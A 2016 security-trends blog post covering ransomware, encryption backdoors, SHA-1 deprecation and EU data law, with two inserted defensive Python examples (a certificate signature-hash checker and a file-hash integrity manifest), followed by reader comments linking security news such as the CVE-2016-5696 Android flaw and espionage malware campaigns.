Security trends for 2016

Here are my predictions for trends in information security and cyber security for the year 2016.

The year 2015 was pretty bad for information security, and I would say that the trend is worrying. So I expect that 2016 will bring many information security challenges. If you want to keep yourself up at night, spend some time reading about the latest developments in cybersecurity. In 2015 airplanes were hacked, cars were hacked, and vulnerabilities were found in a breathtaking range of sensitive equipment, from TSA locks to voting booths to medical devices. The big picture is even scarier: former NSA Director Mike McConnell suspects China has hacked “every major corporation” in the US. Those problems will continue in 2016, and new targets for attacks will be found. The system is broken. It isn’t keeping us, our companies, or our government safe. Worse yet, no one seems to know how to fix it.

Attacks through networks are becoming more common all the time, and it will be hard to protect against targeted attacks. Hackers will not only customize malware, but will increasingly use sophisticated phishing and social engineering tricks to gain access to sensitive data. Attackers usually cover their tracks carefully, so identifying who is behind an attack can be very difficult. Behind targeted attacks are usually professional criminals. Criminals do not respect geographical borders, and hence attacks are spread evenly everywhere. Companies will struggle to absorb the security threats of combined PC and mobile device fleets in 2016.

EU information security decisions made in late 2015 will have an impact on what comes in 2016: the new EU data protection legislation package was approved, and the EU Court of Justice ruled that the Safe Harbor procedure is invalid. This means that transfers of personal data from EU countries to the United States under Safe Harbor are now unlawful; you need some other legal basis for them. The situation will probably get clarified during 2016. The data protection legislation changes will lead to increased fines for the unprepared. Legal uncertainty and big fines are a toxic cocktail for some companies. The combination of stiff penalties and ambiguously worded provisions in the new EU-wide data protection law, which would replace a patchwork of 28 national laws, raises daunting prospects for companies operating in Europe.

After the huge number of user information leaks in 2015 from all kinds of Internet services, cloud companies will face the challenge of gaining trust in their security. You might just have dared to trust “the right cloud services,” since from the traditional information security point of view the main things seemed to be in order, but the leaks have raised privacy concerns.

New environments will bring new threats. New operating system versions mean that administrators and users are less familiar with the environments. IPv6 will get more widely used, and the security of IPv6 networks is different from IPv4. Organizations are moving to virtualized environments, which are complex and create network layers that can become an attack vector. Growing network virtualization functionality and programmability are both an opportunity and a threat to security. Cyber security research will be important in 2016, as 5G networks will be critical infrastructure on top of which, for example, transport, industry, health care and new operators will set up their business around 2020.

The huge amount of information security news is becoming harder and harder to manage in 2016. A key problem with security revelations, as with all other news coverage, is the exponential growth of information. There are a variety of news summaries produced on a daily basis, but they are not enough to get a good picture of what is happening. There are bigger and smaller news items, the impact of which is at times very difficult to assess. SMBs will become a bigger target for cybercriminals. Network and security professionals continue to be among the toughest IT talent to find and hire.

The old way of network security, focused on perimeter defense, is not enough in 2016. The old mantras “encrypt everything” and “secure the perimeter” are not enough. One deceptive truth seems to drive much of the cybersecurity industry down a rabbit hole: if you keep bad actors and bad software out of your system, you have nothing to worry about. It does not work like that anymore. As perimeter security gets stronger, malicious actors are looking for easier entry points to compromise an organisation through the breadth of its digital attack surface. Now malicious actors target “endpoints”, any device or sensor connected to a network, to break into that network. Traditional sandboxing will no longer protect against the growing malware landscape. Today, most private networks have far too many endpoints to properly secure. In an age of “Bring Your Own Device,” the cloud, remote access, and the Internet of Things, there are too many vulnerabilities hackers can exploit. Keep in mind that everything connected to the Internet can, and will, be hacked. To address those threats in 2016, security experts should assume compromise, that hackers and malware already have breached their defenses or soon will, and instead classify and mitigate threats. In addition to the lock-and-key system of public key infrastructure, you will also need an integrity solution that acts like an alarm. To protect against advanced threats, security professionals will increase their reliance on centralized security management solutions. You need to have prioritization and response plans for various kinds of breaches, with a strong focus on integrity.

The tension between law enforcement and Silicon Valley will continue to be strong throughout 2016. In 2015 law enforcement and politicians on both sides of the Atlantic lined up to repeatedly complain that the web was “going dark” as the result of end-to-end encryption and that this was hampering the investigation of terrorism and other serious crimes. Technologists and cryptographers argue that governments are trying to weaken encryption by demanding some form of privileged access for government. It’s not clear how much encryption the NSA can break. With renewed focus on how encrypted messages can be used to plot terrorist attacks, President Barack Obama’s administration is stepping up pressure on the tech sector to help in the battle. Privacy remains a major counter-argument. It seems that governments lie about encryption backdoors. Encryption systems weakened by mandated backdoors would not be effective in fighting the terrorists that governments invoke as their reason for wanting those backdoors in the first place.

But this does not stop some government officials from demanding such a thing, with varying success in different countries. Another fact is that coded communications are a reality and the U.S. may not be able to do much about it, because nearly everyone living in modern society uses them: encryption protects your bank information, prevents your password from being stolen when you log into a website, and allows all e-commerce transactions to take place securely. Encryption weakened by mandated backdoors would put all of us at an enormous risk of exposure from data breaches and associated online risks. The truth in 2016 is that any form of privileged access for government, i.e. a backdoor, would inevitably weaken crypto-systems and make them more vulnerable to attacks by foreign governments’ intelligence agencies as well as criminals. Juniper’s VPN security hole is proof that government backdoors are bonkers. Encryption backdoors would be a gleeful win-win for terrorists and a horrific lose-lose for you: the bad guys would have strong protections for their data, and the rest of us would not. Poorly thought-out and crude surveillance techniques can have a devastating effect on a country’s Internet security; for example, Kazakhstan will force its citizens to install Internet backdoors by requiring all Internet users to install a state-issued root certificate by January 1, 2016.

Google, Mozilla and Microsoft are pushing for an early SHA-1 cutoff that could happen in 2016 instead of the earlier planned January 1st, 2017, due to recent research showing that SHA-1 is weaker than previously believed, because collisions can be found without enormous effort. Mozilla, Microsoft and now Google are all considering bringing the deadline forward by six months to July 1, 2016. SHA-2 is going to be used as the replacement function for SHA-1. Websites like Facebook and those protected by CloudFlare have implemented a SHA-1 fallback mechanism for those clients that do not support SHA-2. Chrome will start displaying errors if SHA-1 certificates are employed in early 2016 and will completely stop supporting SHA-1 certificates at the end of 2016.
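Finding the SHA-1 signed certificates still in use is the first step of the migration the paragraph describes. The following is an added example, not code from the original post: it reads the outer signatureAlgorithm OID of a DER-encoded X.509 certificate with a minimal ASN.1 reader (standard library only) and classifies it by hash family. The certificate bytes it is run on are constructed stand-ins with the real outer Certificate layout, not real certificates.

```python
"""Added example: flag SHA-1 certificate signatures in DER-encoded X.509 files."""
from typing import Tuple

# Well-known signature algorithm OIDs (RFC 3279, RFC 4055, RFC 5758).
SIGNATURE_OIDS = {
    "1.2.840.113549.1.1.5": ("sha1WithRSAEncryption", "SHA-1"),
    "1.2.840.113549.1.1.11": ("sha256WithRSAEncryption", "SHA-2"),
    "1.2.840.113549.1.1.12": ("sha384WithRSAEncryption", "SHA-2"),
    "1.2.840.113549.1.1.13": ("sha512WithRSAEncryption", "SHA-2"),
    "1.2.840.10045.4.1": ("ecdsa-with-SHA1", "SHA-1"),
    "1.2.840.10045.4.3.2": ("ecdsa-with-SHA256", "SHA-2"),
    "1.2.840.10045.4.3.3": ("ecdsa-with-SHA384", "SHA-2"),
}


def read_tlv(data: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one DER tag-length-value element at pos; return (tag, value, next_pos)."""
    tag = data[pos]
    length = data[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low bits give the byte count
        n = length & 0x7F
        length = int.from_bytes(data[pos:pos + n], "big")
        pos += n
    value = data[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated DER element")
    return tag, value, pos + length


def decode_oid(content: bytes) -> str:
    """Decode OBJECT IDENTIFIER content octets into dotted notation."""
    arcs = [content[0] // 40, content[0] % 40]
    acc = 0
    for b in content[1:]:
        acc = (acc << 7) | (b & 0x7F)       # base-128, high bit set on continuation bytes
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(str(a) for a in arcs)


def signature_algorithm(cert_der: bytes) -> str:
    """Return the dotted OID from Certificate.signatureAlgorithm (second element)."""
    tag, cert, _ = read_tlv(cert_der, 0)
    if tag != 0x30:
        raise ValueError("certificate is not a SEQUENCE")
    _, _tbs, pos = read_tlv(cert, 0)        # tbsCertificate: skipped
    tag, alg_id, _ = read_tlv(cert, pos)    # AlgorithmIdentifier ::= SEQUENCE { OID, params }
    if tag != 0x30:
        raise ValueError("malformed AlgorithmIdentifier")
    tag, oid, _ = read_tlv(alg_id, 0)
    if tag != 0x06:
        raise ValueError("AlgorithmIdentifier does not start with an OID")
    return decode_oid(oid)


def classify(cert_der: bytes) -> Tuple[str, str]:
    """Return (algorithm name, hash family); unknown OIDs are reported, not guessed."""
    oid = signature_algorithm(cert_der)
    return SIGNATURE_OIDS.get(oid, (oid, "unknown"))


def needs_replacement(cert_der: bytes) -> bool:
    """True when the certificate carries a SHA-1 signature and must be reissued."""
    return classify(cert_der)[1] == "SHA-1"


# Constructed stand-ins (not real certificates) with the real outer layout:
# SEQUENCE { tbsCertificate, signatureAlgorithm, signatureValue BIT STRING }.
def fake_cert(alg_oid: bytes) -> bytes:
    tbs = b"\x30\x03\x02\x01\x02"                        # minimal SEQUENCE { INTEGER 2 }
    alg = b"\x30" + bytes([len(alg_oid) + 2]) + b"\x06" + bytes([len(alg_oid)]) + alg_oid
    sig = b"\x03\x02\x00\xff"                            # BIT STRING with a dummy value
    body = tbs + alg + sig
    return b"\x30" + bytes([len(body)]) + body


SHA1_RSA_CERT = fake_cert(bytes.fromhex("2a864886f70d010105"))     # 1.2.840.113549.1.1.5
SHA256_RSA_CERT = fake_cert(bytes.fromhex("2a864886f70d01010b"))   # 1.2.840.113549.1.1.11
ECDSA_SHA256_CERT = fake_cert(bytes.fromhex("2a8648ce3d040302"))   # 1.2.840.10045.4.3.2

if __name__ == "__main__":
    for name, cert in [("sha1", SHA1_RSA_CERT), ("sha256", SHA256_RSA_CERT),
                       ("ecdsa", ECDSA_SHA256_CERT)]:
        print(name, classify(cert), "replace" if needs_replacement(cert) else "ok")
```

On real input, read the file with `open(path, "rb").read()` (PEM files must be base64-decoded between the BEGIN/END lines first) and feed the bytes to `needs_replacement`.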

The use of blockchain technology, a permissionless distributed database based on the bitcoin protocol that runs across a global network of independent computers, will spread beyond Bitcoin virtual money. With bitcoin, the blockchain tracks the exchange of money. But it can also track the exchange of anything else that holds value, including stocks, bonds, and other financial securities. Overstock has already used the blockchain to issue private bonds. The Securities and Exchange Commission has approved a plan from online retailer Overstock.com to issue company stock via the Internet, signaling a significant shift in the way financial securities will be distributed and traded in the years to come. Overstock built its technology under the aegis of a subsidiary called TØ.com, and it plans to offer this “cryptosecurity” tech as a service to other businesses. Nasdaq OMX, the company behind the Nasdaq stock exchange, is using the blockchain to oversee the exchange of private stock. Also, several major companies from across both the technology and financial industries, including IBM, Intel, and Cisco as well as the London Stock Exchange Group and big-name banks JP Morgan, Wells Fargo, and State Street, have joined forces with the Linux Foundation to create an alternative to the blockchain.

The use of disk encryption will increase, and there are different ways to do it with different security levels. Microsoft has introduced Windows 10 disk encryption where the recovery keys are uploaded to Microsoft. This approach has some advantages and disadvantages. The gold standard in disk encryption is end-to-end encryption, where only you can unlock your disk. This is what most companies use, and it seems to work well. It protects data in case your device is lost or stolen. But what if you forget or lose your key? There are certainly cases where it’s helpful to have a backup of your key or password, so keeping a backup of your recovery key in your Microsoft account could be genuinely useful for probably the majority of users who don’t have high security needs. The disadvantage of this approach is that your computer is now only as secure as that database of keys held by Microsoft, which means it may be vulnerable to hackers, foreign governments, and people who can extort Microsoft employees.

Weak and leaked passwords are still a huge security problem in 2016. Passwords are often the weakest part when it comes to securing users’ accounts, as many don’t use complex passwords or they reuse the same password across services. Two-factor authentication, like using a USB stick with a secret token or entering a code sent by text message to your phone, can help to increase security, but many users also find this to be a hassle as it introduces an additional step to the login process.

Google has begun testing a login system that uses phone notifications for authentication instead of passwords: users authenticate by responding to a notification sent to their smartphone. The idea is similar to Yahoo’s recently launched “Account Key,” which also offers a password-free means of signing in involving a push notification sent to your phone that then opens an app where you approve the log-in.

The smartphone will become a more and more security-critical part of your life. “Increasingly, individuals and organisations are adopting password managers and multi-factor authentication technologies to plug some of the holes in password-based authentication. We foresee a world where practically everyone uses their smartphone as a multi-factor authentication element. In this world, the smartphone becomes your most valuable asset: something that enables you to unlock your life online and a target for attackers seeking to access your services.”

Expect that the number of mobile vulnerabilities will only grow in 2016. In 2016 we will see increasing numbers of cyber criminals using mobile applications to spread malware. Mobile presents an easy target for cyber criminals, because it is an attack surface that is open and extremely difficult to defend once an app has been released. Android threats will become more than just headline-grabbers. Will 2016 be the year iOS malware goes mainstream?

Critical infrastructures will be highly targeted in 2015. SCADA and ICS networks were not designed for security. Attacks against these systems have increased in recent years, and I expect this trend to only get worse. There are still many companies that run their critical systems on Windows XP, as “There are some people who don’t have an option to change.” Many times the OS is running in automation and process control systems that run business- and mission-critical systems, both in private sector and government enterprises. For example, the US Navy is using the obsolete Microsoft Windows XP to run critical tasks. It all comes down to money and resources, but if someone is obliged to keep something running on an obsolete system, it’s the wrong approach to information security completely.

Cars were hacked at a record rate in 2015, and they will be hacked at least at the same rate in 2016. Modern cars feature more gadgetry and connected systems, and this will make vehicles just as vulnerable to today’s threats and attacks. I Am The Cavalry has published a Five Star Cyber Safety Framework to mitigate this threat in cars; hopefully car component makers study it.

IoT and smart devices are still at risk. The Internet of Things will continue to emerge, and businesses will need to think about how to protect their smart devices and prepare for the wider adoption of IoT. IoT platforms are not yet the weapon of choice for commercial malware authors, but businesses beware. Wearables won’t be safe either, as they are built using largely the same, too often vulnerable, technologies as other IoT systems. IoT security is still in its infancy in 2016.

Cyber criminals became more active in 2015, particularly with ransomware. The ransomware problem will continue to be big in 2016. Commercial malware authors will continue to invest heavily, and exploit kits will continue to dominate on the web. Ransomware today is big business. Ransomware takes control of a computer and holds it hostage until the victim pays, usually in the digital currency Bitcoin. As a remedy against ransomware, I recommend making sure that your IT support or service provider has the data backup and restore procedure operational, practiced and tested. You may need it in 2016 to get your data back without having to consider paying criminals. To date ransomware has hit Windows users hardest, although Android and MacOS users are now also facing similar extortion.
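The "integrity solution that acts like an alarm" asked for in the perimeter paragraph above and the "practiced and tested" restore procedure recommended here rest on the same primitive: a manifest of file hashes that a later tree can be checked against. The following is an added example, not code from the original post: `build_manifest` records a SHA-256 digest per file, `compare_manifests` reports what was added, removed or modified, and `verify_restore` applies that check to a directory a backup was restored into. Standard library only; the sample tree in `demo` is constructed in a temporary directory.

```python
"""Added example: hash manifest used as a file integrity alarm and as a restore test."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, NamedTuple, Set

Manifest = Dict[str, str]  # relative POSIX path -> hex SHA-256 digest


class Diff(NamedTuple):
    added: Set[str]
    removed: Set[str]
    modified: Set[str]

    def clean(self) -> bool:
        """True when the tree matches the baseline exactly."""
        return not (self.added or self.removed or self.modified)


def sha256_file(path: Path) -> str:
    """Stream the file so large backups do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> Manifest:
    """Hash every regular file below root, keyed by its path relative to root."""
    manifest: Manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            manifest[path.relative_to(root).as_posix()] = sha256_file(path)
    return manifest


def compare_manifests(baseline: Manifest, current: Manifest) -> Diff:
    """Classify every path as added, removed or modified relative to baseline."""
    base_keys, cur_keys = set(baseline), set(current)
    modified = {k for k in base_keys & cur_keys if baseline[k] != current[k]}
    return Diff(added=cur_keys - base_keys, removed=base_keys - cur_keys, modified=modified)


def verify_restore(manifest_at_backup: Manifest, restored_root: Path) -> Diff:
    """Restore test: the restored tree must reproduce the manifest taken at backup time.
    Anything in `removed` means data was lost; anything in `modified` means it was altered."""
    return compare_manifests(manifest_at_backup, build_manifest(restored_root))


def demo() -> Diff:
    """Constructed scenario: take a baseline, then rewrite one file in place and drop a
    new file next to it, the kind of change an integrity alarm should flag."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "docs").mkdir()
        (root / "docs" / "report.txt").write_text("quarterly numbers\n")
        (root / "config.ini").write_text("[db]\nhost=localhost\n")
        baseline = build_manifest(root)
        (root / "docs" / "report.txt").write_bytes(b"\x00\x17unreadable")   # rewritten in place
        (root / "docs" / "README_RESTORE.txt").write_text("note dropped\n")  # new file
        return compare_manifests(baseline, build_manifest(root))


if __name__ == "__main__":
    diff = demo()
    print("clean" if diff.clean() else f"ALARM added={diff.added} removed={diff.removed} "
                                        f"modified={diff.modified}")
```

Store the baseline manifest somewhere the protected host cannot write to (otherwise an intruder who can alter files can also alter the record of them), and run `verify_restore` as part of every restore drill rather than only when an incident forces the question.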

Ransomware will continue to dominate in 2016, and it is only a question of time before we see things beyond data being ransomed. We have already seen websites being held to ransom with DDoS. Intel’s McAfee Labs also noted a huge spike in ransomware in early 2015, and worries about ransomware in the IoT space, including medical devices. And Kaspersky predicts the “nightmare of ransomware” to continue and “spread to new frontiers” in 2016. The article “Ransomware Is Coming to Medical Devices” tells that, according to a report released recently by Forrester Research, the number one cybersecurity prediction for 2016 is: “We’ll see ransomware for a medical device or wearable.” “It’s definitely feasible from a technical standpoint.” Networked medical devices save lives. Despite the hacking risk, it’s an informed trade-off. Medical device ransomware would be a modern form of highway robbery with lives at stake.

2,232 Comments

  1. Tomi Engdahl says:

    Linux bug leaves 1.4 billion Android users vulnerable to hijacking attacks
    Off-path attack means malicious hackers can be located anywhere on the Internet.
    http://arstechnica.com/security/2016/08/linux-bug-leaves-1-4-billion-android-users-vulnerable-to-hijacking-attacks/

    An estimated 80 percent of Android phones contain a recently discovered vulnerability that allows attackers to terminate connections and, if the connections aren’t encrypted, inject malicious code or content into the parties’ communications, researchers from mobile security firm Lookout said Monday.

    As Ars reported last Wednesday, the flaw first appeared in version 3.6 of the Linux operating system kernel, which was introduced in 2012. In a blog post published Monday, Lookout researchers said that the Linux flaw appears to have been introduced into Android version 4.4 (aka KitKat) and remains present in all future versions, including the latest developer preview of Android Nougat. That tally is based on the Android install base as reported by statistics provider Statista, and it would mean that about 1.4 billion Android devices, or about 80 percent of users, are vulnerable.

    “The tl;dr is for Android users to ensure they are encrypting their communications by using VPNs, [or] ensuring the sites they go to are encrypted,” Lookout researcher Andrew Blaich told Ars. “If there’s somewhere they’re going to that they don’t want tracked, always ensure they’re encrypted.”

    The vulnerability makes it possible for anyone with an Internet connection to determine whether any two parties are communicating over a long-lived transport control protocol connection, such as those that serve Web mail, news feeds, or direct messages. In the event the connections aren’t encrypted, attackers can then inject malicious code or content into the traffic. Even when the connection is encrypted, the attacker may still be able to determine a channel exists and terminate it. The vulnerability is classified as CVE-2016-5696.

    A Google representative said company engineers are already aware of the vulnerability and are “taking the appropriate actions.” As noted in this post, the representative pointed out the flaw resides within vulnerable versions of the Linux kernel and it’s not Android specific. The representative went on to say that the Android security team rates the risk “moderate,” as opposed to “high” or “critical” for many of the vulnerabilities it patches. Maintainers of the Linux kernel have already patched CVE-2016-5696. It wouldn’t be surprising if that fix is incorporated into a new Android release in the next month or so.

    Reply
  2. Tomi Engdahl says:

    Joseph Cox / Motherboard:
    US court documents show Australian authorities hacked Tor users in US as part of a child pornography investigation and shared the findings with the FBI — Australian authorities hacked Tor users in the US as part of a child pornography investigation, Motherboard has learned.

    Australian Authorities Hacked Computers in the US
    http://motherboard.vice.com/read/australian-authorities-hacked-computers-in-the-us

    Reply
  3. Tomi Engdahl says:

    Ask HN: Is the Delta outage a ‘bug’ or a malicious hack? | Hacker News
    https://news.ycombinator.com/item?id=12251690

    According to the Ars Technica article http://arstechnica.com/business/2016/08/data-center-disaster… a fire broke out in their main datacenter. Assuming that was true, employees were most likely evacuated and at the very least would have been distracted. Their disaster recovery plan may have assumed that there would be admins onsite to run a manual switch, may have assumed a complete failure instead of a partial failure or may have had per application disaster recovery plans. Disaster recovery is a difficult and stressful process in normal times, much more so when your regular workstation(s) are unavailable and you’re faced with a disaster-level distraction like a fire.

    I am really surprised they don’t have a high availability setup for their database, etc being a fortune 500 company. Hours of downtime is serious money for them it would seem. Well if they did have such setup, it failed.

    Even a bootstrapped startup could get a MongoDB Cluster or something similar going in multiple datacenters.

    The power company Tweeted about it also. https://twitter.com/GeorgiaPower/status/762662968572215296

    So I guess it was a power outage only at their place…

    But the whole idea of not having working redundancy in a multibillion dollar business really makes me question their story.

    So not to sound like a conspiracy theorist, but I do think there is a possibility they got hacked. And if that hunch is true then calling it a power outage instead of admitting it is a insult to our intelligence.

    Delta Air Lines Computer Hack? Flight Delays, 300 Cancellations, People Screaming At Gate Agents, Conspiracy Theories
    http://www.inquisitr.com/3396506/delta-air-lines-computer-hack-flight-delays-300-cancellations-people-screaming-at-gate-agents-conspiracy-theories/#yMJXLhLC180WDieY.99

    Was Delta hacked? The worldwide Delta Air Lines outage is causing quite a fuss for airline passengers around the world on Monday, August 8. The trending #Delta hashtag on Twitter reveals all sorts of theories about why Delta Air Lines planes have been grounded across the globe.

    According to the official Twitter account named @Deltanewshub, there was a power outage that had an effect on Delta Airlines flights around the world.

    Reply
  4. Tomi Engdahl says:

    Forensics tool nabs data from Signal, Telegram, WhatsApp
    ‘Retroscope’ smartphone app can retrieve your last five screens
    http://www.theregister.co.uk/2016/08/15/retroscope/

    USENIX VID University researchers have developed a new method to help forensic investigators extract data information from memory.

    The tool, dubbed Retroscope, recovered data from up to the previous 11 screens displayed from up to 15 apps, with an average of five screens pulled from each.

    Apps included Signal, Skype, WeChat, Gmail, Facebook, WhatsApp, and Telegram running on a Samsung S4, LG G3, and HTC One.

    It is a “new paradigm in smartphone forensics”, according to the team of Brendan Saltaformaggio, Rohit Bhatia, Xiangyu Zhang, and Dongyan Xu of Purdue University, and Golden G. Richard III of the University of New Orleans.

    “We feel without exaggeration that this technology really represents a new paradigm in smartphone forensics,” Saltaformaggio says.

    Public release of the RetroScope Android memory forensics framework
    https://github.com/ProjectRetroScope/RetroScope

    Reply
  5. Tomi Engdahl says:

    WikiLeaks released a cache of malware in its latest email dump
    Critics say the materials could endanger the free speech advocates it is meant to help.
    https://www.engadget.com/2016/08/15/wikileaks-released-a-cache-of-malware-in-its-latest-email-dump/

    In its rush to let information be free, WikiLeaks has released over 80 different malware variants while publishing its latest collection of emails from Turkey’s ruling AKP political party. In a Github post, security expert Vesselin Bontchev has laid out many of the instances of malicious links, most of which came from “run-of-the-mill” spam and phishing emails found in the dump. While WikiLeaks has claimed the emails shed light on corruption within the Turkish government, New York Times reporter Zeynep Tufekci has pointed out that the materials have little to do with Turkish politics and mostly appear to be mailing lists and spam.

    Malware hosted by Wikileaks
    https://github.com/bontchev/wlscrape/blob/master/malware.md

    Reply
  6. Tomi Engdahl says:

    China Launches World’s First Quantum Communications Satellite
    https://news.slashdot.org/story/16/08/16/0335214/china-launches-worlds-first-quantum-communications-satellite

    China’s quantum network could soon span two continents, thanks to a satellite launched earlier today. Launched at 1:40pm ET, the Quantum Science Satellite is designed to distribute quantum-encrypted keys between relay stations in China and Europe. When working as planned, the result could enable unprecedented levels of security between parties on different continents. China’s new satellite would put that same fiber-based quantum communication system to work over the air, utilizing high-speed coherent lasers to connect with base stations on two different continents.

    The satellite will be the first device of its kind if the quantum equipment works as planned. According to the Wall Street Journal, the project was first proposed to the European Space Agency in 2001 but was unable to gain funding.

    China’s new satellite would create the world’s largest quantum network
    http://www.theverge.com/2016/8/15/12489914/china-satellite-quantum-encryption-network-launch

    China’s quantum network could soon span two continents, thanks to a satellite launched earlier today. Launched at 1:40PM ET, the Quantum Science Satellite is designed to distribute quantum-encrypted keys between relay stations in China and Europe. When working as planned, the result could enable unprecedented levels of security between parties on different continents.

    The satellite works by the principles of quantum cryptography, similar to existing fiber-based quantum key distribution networks in Europe, China, and the US. By monitoring noise on the network, the system allows distant parties to obtain identical random strings of data without being intercepted by outside parties, providing the raw material for future encrypted communications. Properly applied, the systems resist nearly all conventional forms of decryption, and can be installed by adding specialized routing equipment to existing fiber optic cable.

    China’s new satellite would put that same system to work over the air, utilizing high-speed coherent lasers to connect with base stations on two different continents. The experimental satellite’s payload also includes controllers and emitters related to quantum entanglement. Still, deploying such a system from space remains experimental.

    If successful, the satellite will be the first device of its kind, enabling the world’s first trans-continental quantum key distribution network.

    Reply
  7. Tomi Engdahl says:

    One In Five Vehicle Software Vulnerabilities Are ‘Hair On Fire’ Critical
    https://tech.slashdot.org/story/16/08/13/2157220/one-in-five-vehicle-software-vulnerabilities-are-hair-on-fire-critical

    One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive. “These are the high priority ‘hair on fire’ vulnerabilities that are easily discovered and exploited and can cause major impacts to the system or component,” the firm said in its report…

    The bulk of vulnerabilities that were identified stemmed from a failure by automakers and suppliers to follow security best practices including designing in security or applying secure development lifecycle (SDL) practices to software creation… The result is that vehicle cybersecurity vulnerabilities are not solvable using “bolt-on” solutions, IOActive concluded…

    One in Five Vehicle Vulnerabilities are ‘Hair on Fire’ Critical
    https://securityledger.com/2016/08/one-in-five-vehicle-vulnerabilities-are-hair-on-fire-critical/

    In-brief: One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive.

    One of every five software vulnerabilities discovered in vehicles in the last three years are rated “critical” and are unlikely to be resolved through after the fact security fixes, according to an analysis by the firm IOActive.

    “These are the high priority ‘hair on fire’ vulnerabilities that are easily discovered and exploited and can cause major impacts to the system or component,” the firm said in its report, which it released last week. The report was based on an analysis of more than 150 vehicle security flaws identified over three years by IOActive or publicly disclosed by way of third-party firms.

    The results, while not dire, are not encouraging. The bulk of vulnerabilities that were identified stemmed from a failure by automakers and suppliers to follow security best practices including designing in security or applying secure development lifecycle (SDL) practices to software creation. “These are all great things that the software industry learned as it has progressed in the last 20 years. But (automakers) are not doing them.”

    The result is that vehicle cybersecurity vulnerabilities are not solvable using “bolt-on” solutions, IOActive concluded. That is because they are caused by flawed engineering assumptions or insecure development best practices. “The most effective cybersecurity work occurs during the planning, design and early implementation phases of products, with the difficulty and cost of remediation increasing in correlation with product age and complexity,” IOActive’s report notes.

    Commonalities in Vehicle Vulnerabilities
    http://www.infosecurity-magazine.com/download/227664/

    Reply
  8. Tomi Engdahl says:

    ‘You’re welcome’: Snowden casts light on NSA hack
    https://www.rt.com/usa/356170-snowden-analysis-nsa-hack/

    The files released by a hacker group that claims to have breached the NSA are authentic, whistleblower Edward Snowden has said, explaining the documents’ importance and potential impact on the US elections and relations with allies around the world.

    Snowden, who blew the whistle on NSA surveillance operations in 2013, posted a series of tweets on Tuesday with his take on the hack.

    Reply
  9. Tomi Engdahl says:

    How IoT companies can beef up their data security
    http://thenextweb.com/entrepreneur/2016/08/15/how-iot-companies-can-beef-up-their-data-security/

    With high-profile data breaches all over the news, cybersecurity is on everyone’s mind. But beyond educating staff and users alike on best practices, what can Internet of Things companies do to improve their data security practices as they rush to ship products out the door?

    To find out, I asked 10 entrepreneurs from YEC

    Reply
  10. Tomi Engdahl says:

    Paul Thurrott / Thurrott.com:
    Microsoft consolidates its separate two-factor authentication apps into one new app, Microsoft Authenticator, for Android and iOS

    Microsoft Authenticator Now Available on Android and iOS
    https://www.thurrott.com/mobile/76205/microsoft-authenticator-now-available-android-ios

    As promised, Microsoft has updated and renamed its previous account verification app for Android and iOS, Azure Authenticator, to Microsoft Authenticator. This app lets you use multi-factor authentication (MFA) with your online accounts. And do so more easily than before.

    The newly updated Microsoft Authenticator apps for Android and iOS replace the previous Azure Authenticator apps, and will replace a weird smattering of other apps (like Microsoft Account on Android) as well.

    Reply
  11. Tomi Engdahl says:

    New security requirements for companies: economic sanctions “unprecedented”

    Does your company have a cyber security strategy? Is someone leading security, and has a responsible person been named?

    Carelessness can become extremely expensive. The EU’s new Data Protection Regulation enters into force in Finland in 2018, provided the Ministry of Justice has the details ready. In future, company management must actively and demonstrably ensure the adequacy of their security.

    Registers containing personal information get special protection in the Regulation.

    If leakage of sensitive information and non-compliance are found, the economic sanctions are of unprecedented extent in Finland. The fine may, at worst, rise to EUR 20 million or four per cent of the company’s worldwide turnover, whichever is greater. These come on top of any damages.

    The opening question comes from a survey the international IT giant CGI has just completed in Finland, “Cyber security in Finnish organizations 2016”, which asked 200 organizations about their perception of their own data security.

    Based on the survey, companies’ attitude to cyber security is partly contradictory. Digitalization has brought risk awareness with it, but surprisingly few businesses have started to lead security or made a cyber security strategy. Only half of the organizations say their cyber security is in the hands of an expert. Only 29 per cent have made a cyber security strategy.

    Two-thirds of respondents considered it likely that their organization has been the target of cyber-attacks without anyone knowing about it. An even greater proportion expect an intrusion within a year. Inconsistently, 69 percent believe in their organization’s ability to identify cyber-attacks, and 60 per cent also say they have detected some.

    Today, insurance is available to cover the economic risks of a data breach. Only a few companies had purchased such insurance, but one in five were considering it.

    The situation is worst in the energy and water sectors and in health and wellness businesses. Public administration, defence, IT, the financial sector and industry are more awake.

    Source: http://www.tivi.fi/Kaikki_uutiset/yrityksille-uusia-tietoturvavaatimuksia-taloudelliset-sanktiot-ennennakemattomat-6573900

    Reply
  12. Tomi Engdahl says:

    “HOMEKit” Exploit Generator Used to Deliver Espionage Malware
    http://www.securityweek.com/homekit-exploit-generator-used-deliver-espionage-malware

    Researchers have come across a document exploit generator that has been used over the past few years by several threat actors to deliver malware in cyber espionage campaigns.

    The toolkit, dubbed “HOMEKit” by Palo Alto Networks, is believed to have been used to generate malicious Microsoft Word documents for various campaigns since 2013. Similar to the MNKit exploit generator, HOMEKit relies on the CVE-2012-0158 vulnerability in Office to deliver malware.

    HOMEKit is designed to exploit a vulnerability in the TreeView ActiveX control. If the flaw is exploited successfully, a shellcode is executed and a decoy document is opened. In the meantime, a payload (.dat file) is executed on the system.

    “The difference between the functional shellcode that installs Cookle and DarkHotel lies in the way a process is created to execute the payload and to open the decoy document,”

    Reply
  13. Tomi Engdahl says:

    MONSOON Cyber-Espionage Campaign Linked to Patchwork APT
    http://www.securityweek.com/monsoon-cyber-espionage-campaign-linked-patchwork-apt

    A cyber-espionage campaign operating for more than eight months has been linked to an Indian Advanced Persistent Threat (APT) group known as Patchwork, which might be the same attackers behind Operation Hangover, Forcepoint researchers warn.

